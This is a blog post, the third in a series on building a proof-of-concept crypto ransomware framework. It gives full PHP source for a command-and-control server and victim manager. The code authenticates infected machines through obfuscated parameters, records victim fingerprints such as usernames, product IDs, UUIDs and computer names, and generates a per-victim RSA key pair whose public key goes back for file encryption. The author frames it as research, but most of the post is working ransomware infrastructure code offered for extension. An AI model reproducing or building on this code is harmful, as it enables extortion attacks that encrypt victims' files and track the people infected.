Creating a POC Crypto Ransomware Framework – 3

Warning: Please read the Site Disclaimer before proceeding.

This post is the third part of the series Creating a POC Crypto Ransomware Framework. In the previous section, I discussed how a crypto ransomware rather any malware is spread by attackers citing two different scenarios. In this post, I ‘ll discuss C&C Server and a Victim Manager and their functionalities in Crypto Ransomware framework.

C&C Server and Victim Manager

C&C Server, an abbreviation for “Command and Control Server” which is used by attackers to send commands to systems infected by malware. These commands can be a set of predefined instructions to the malware to perform or can be system commands to the victim if malware provides a remote access to the attacker.

In my framework,  I have developed the C&C Server in Kali Machine and uses pre-installed Apache Web Server and PHP language. I have hosted the code at https://github.com/pr454nn4kum4r/pkw4r3. The following screenshot shows the directory structure of the C&C Server.

The is just a simple framework wherein C&C server application controls the key pair generation required in the encryption process of the infected machine using Victim Manager Application. Victim Manager is present in ‘victim_manager’ folder. I’ll discuss each file one by one and later summarise the control flow at last.

auth.php

<?php
function check_authcode($auth_code)
{
    $auth_code_length = strlen($auth_code);
    
    if (($auth_code_length >= 25) && ($auth_code_length <= 55)) {
        
        $first_check_pos  = floor($auth_code_length / 2);
        $second_check_pos = floor($auth_code_length / 4);
        $first_check_num  = substr($auth_code, $first_check_pos, 2);
        $second_check_num = substr($auth_code, $second_check_pos, 2);
        if (($first_check_num % 5 === 0) && ($second_check_num % 3 === 0)) {
            return "you_are_your_mothers_trueborn_son_of_lannister";
        } else {
            return "What_do_we_say_to_Lord_of_Death_Not_Today";
        }
        
    }
}
?>

Ransomware authors try to make the communication between the infected system and C&C Server as stealthy as possible. They employ different techniques to hide the requests and responses with their own algorithms and protocols. This is a small attempt to show how infected system tells C&C server that it has the authentication code to talk to C&C Server. The authentication code is the result of the simple algorithm which is discussed in Creating a POC Crypto Ransomware Framework – 4. Based on that auth.php  checks ‘auth_code’ as follows:

  • check if the auth_code length is in 25-55 characters
  • if so, check if the character positioned at half the length of auth_code (floored) is divisible by 5
  • also, check if the character positioned at one-fourth length of auth_code (floored) is divisible by 3

control.php

<?php
require_once('auth.php');
require_once('victim_manager/add_victim.php');
/*to check  authcode, ransomware_id params, also fingerprint values in http request*/
if(isset($_GET['if_i_look_back_i_m_lost'])&&isset($_GET['winter_is_coming'])&&isset($_GET['seven_kingdoms'])){
    $auth_code = $_GET['if_i_look_back_i_m_lost'];  /*Auth Code*/
    $ransomware_id = $_GET['winter_is_coming'];    /*Ransomware ID*/
        $values = $_GET['seven_kingdoms']; /*fingerprint values*/
        $auth_result = check_authcode($auth_code);    /*Check Auth Code*/
    #Adding a victim using Ransomware ID	
    if($auth_result==="you_are_your_mothers_trueborn_son_of_lannister"){
        $pubkey=add_victim($ransomware_id, $values);
        echo $pubkey;
        }
}
else{
    exit("The_great_war_is_coming");
}
?>

This is the main module of the C&C Server which takes authentication code, crypto ransomware ID generated by the infected system and also the values (base64 encoded) generated by fingerprinting the infected system as input to respond with a public key. The parameters submitted to control.php are used to add the victim in Victim Manager (‘victim_manager’ folder) and generate a public key pair.

victim_manager

Victim Manager is a sub-application that I designed to make it easily comprehensible for a newbie. This is used to manage victims that are infected with the Crypto Ransomware. Usually, this sort of management applications is deployed in a server that is completely in control of the attacker i.e another server that is connected to C&C server. In my proof of concept, “victim_manager” hosts modules needed to add a victim, generate a key pair. It also stores necessary files related to infected systems in ‘victims’ folder.

add_victim.php

<?php
require_once('key_generate.php');
require_once('add_summary.php');
function add_victim($victim_id, $victim_params)
{
    $report="";
    $victims_dir=__DIR__."/victims/";
    $victim_folders = scandir($victims_dir);
    $folder = '__george_rr_martin_' . md5($victim_id);
    $victim_folder =$victims_dir.$folder;
    if (in_array($folder, $victim_folders)) {
        #$report="ID already exists"
    } else {
        #creating a directory for the victim_id
        mkdir($victim_folder, 0700);
        #$report="directory_created_*";
        #generating  key
        $pub_key_gen = key_generate($victim_id);
        #$report=$report."_key_generated_*";
        #writng values to a file
        $victim_file = $victim_folder.'/'.$victim_id.".json";
        $fileh = fopen($victim_file, "w");
        fwrite($fileh, base64_decode($victim_params));
        fclose($fileh);
        #appending the victim attack summary sheet
        add_summary($victim_file, $folder);
        return $pub_key_gen;
    }
}
?>
/* 'report' variable was used by me for debugging. you can use it to modify the code to add more conditions */

After, the infected system authenticates using auth.php, the control.php calls the add_victim.php to add a victim in victims folder. add_victim.php creates a victim folder using the prefix ‘__george_rr_martin’ and MD5 Sum of crypto ransomware ID, if only it doesn’t exist already. Next step, involves storing the infected system fingerprint values in .json file (base64 decoded). The last step involves key pair generation and adding the victim summary in summary.txt.

key_generate.php

<?php

function key_generate($victim_id)
  {
    $victims_dir = __DIR__ . "/victims/";
    
    $folder = $victims_dir . '__george_rr_martin_' . md5($victim_id);
    
    $config = array(
        "digest_alg" => "sha512",
        "private_key_bits" => 2048,
        "private_key_type" => OPENSSL_KEYTYPE_RSA
        
    );
    
    $res = openssl_pkey_new($config);
    openssl_pkey_export($res, $privkey, NULL, $config);
    
    $privkey_file = $folder . '/' . $victim_id . ".pem";
    $privkf       = fopen($privkey_file, 'w');
    fwrite($privkf, $privkey);
    fclose($privkf);
    
    $pubkey = openssl_pkey_get_details($res);
    $pubkey = $pubkey['key'];
    
    $pubkey_file = $folder . '/' . $victim_id . ".pub";
    $pubkf       = fopen($pubkey_file, 'w');
    fwrite($pubkf, $pubkey);
    fclose($pubkf);
    
    return base64_encode($pubkey);
  }

?>

This module is used to generate RSA 2048 bit key pair and stores it in the respective victim folder. The private key is suffixed with .pem and the public key is suffixed with .pub. Finally, the key is returned to pass it to the infected system for encryption process as described in Creating a POC Crypto Ransomware – 5 in bas64 encoded format.

add_summary.php

<?php
function add_summary($fingerprint, $folder)
{
    $fileh = fopen($fingerprint,'r');
    $fingerprint_read = fread($fileh, filesize($fingerprint));
    $fingerprint_values = json_decode($fingerprint_read);
    fclose($fileh);
    $username= urlencode($fingerprint_values->{'username'});
    $product_id= urlencode($fingerprint_values->{'Product ID'});
    $uuid = urlencode($fingerprint_values->{'UUID'});
    $cpu_id = urlencode($fingerprint_values->{'cpu_id'});
    $computername = urlencode($fingerprint_values->{'computername'});
    $victim_folder = urlencode($folder);
    $data= $username.",".$product_id.",".$uuid.",".$cpu_id.",".$computername.",".$victim_folder."\n";
    #adding to summary.txt
    $summary_file = $_SERVER['DOCUMENT_ROOT'].'/ransomware/c2c/victim_manager/summary.txt';
    $fileh = fopen($summary_file, "a");
    fwrite($fileh, $data);
    fclose($fileh);
}

This module is used to add the summary of the infected system to summary.txt using JSON file that stores the parameters of the infected system.

summary.txt

This contains the summary of the infected system in the following format

Username,ProductID,UUID,CPUID,ComputerName,VictimFolder

Control Flow

When an infected system initiates communication with the C&C Server, control.php adds a victim using add_victim.php after checking the authentication code using auth.php. add_victim.php creates a victim folder using ransomware ID and generates an RSA 2048bits key pair using key_generate.php. A summary of the victim is added in summary.txt using add_summary.php. The public key from the generated key pair is passed to the victim.

This post discussed how I designed the C&C Server for the proof of concept. One can extend the functionalities based on the needs you want to research. The next part of the series discusses the Intialisation phase after a system is infected with malware before it communicates with C&C server.

Creating a POC Crypto Ransomware – 4

 

Leave a Reply

Your email address will not be published. Required fields are marked *